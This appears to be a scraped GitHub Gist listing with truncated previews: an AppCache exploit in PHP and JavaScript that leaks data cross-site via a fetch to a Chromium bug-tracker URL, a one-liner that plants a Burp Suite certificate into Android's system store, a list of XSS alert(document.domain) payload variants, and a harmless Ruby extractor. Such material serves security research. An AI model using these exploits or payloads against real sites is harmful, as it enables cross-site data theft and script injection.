lbherrera
/ cache.php
Last active
June 5, 2021 03:36
Source code for the exploit used in the "AppCache's forgotten tales" article (https://blog.lbherrera.me/posts/appcache-forgotten-tales/).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html manifest="manifest.php?patternA=<?php echo $_GET["patternA"]; ?>&patternB=<?php echo $_GET["patternB"]; ?>&prefix=<?php echo $_GET["prefix"]; ?>"> | |
| <body> | |
| <script> | |
| let patternA = new URL(location).searchParams.get("patternA"); | |
| let patternB = new URL(location).searchParams.get("patternB"); | |
| let prefix = new URL(location).searchParams.get("prefix") || ''; | |
| applicationCache.addEventListener("cached", () => { | |
| fetch("https://bugs.chromium.org/p/chromium/issues/entryafterlogin", { | |
| mode: "no-cors", |
vavkamil
/ android-burp-cert.sh
Created
September 10, 2019 14:47
One Liner For Installing Burp Certificate Into Android Nougat and Later
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://securitychops.com/2019/08/31/dev/random/one-liner-to-install-burp-cacert-into-android.html | |
| # | |
| curl --proxy http://127.0.0.1:8080 -o cacert.der http://burp/cert \ | |
| && openssl x509 -inform DER -in cacert.der -out cacert.pem \ | |
| && cp cacert.der $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 \ | |
| && adb root \ | |
| && adb remount \ | |
| && adb push $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /sdcard/ \ | |
| && echo -n "mv /sdcard/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /system/etc/security/cacerts/" | adb shell \ | |
| && echo -n "chmod 644 /system/etc/security/cacerts/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0" | adb shell \ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # The program e is a command line utility that extracts lots of | |
| # different archives. It is very simple and can be extended very easily. | |
| # | |
| # It is inspired by how firewall use their rulesets, and works like this: | |
| # | |
| # * For each file that has to be extracted, the rules are matched one after the other. | |
| # * When a rule matches (either by the filetype or filename), the command is executed. | |
| # * If the command does not return an error code the extraction is considered successful, |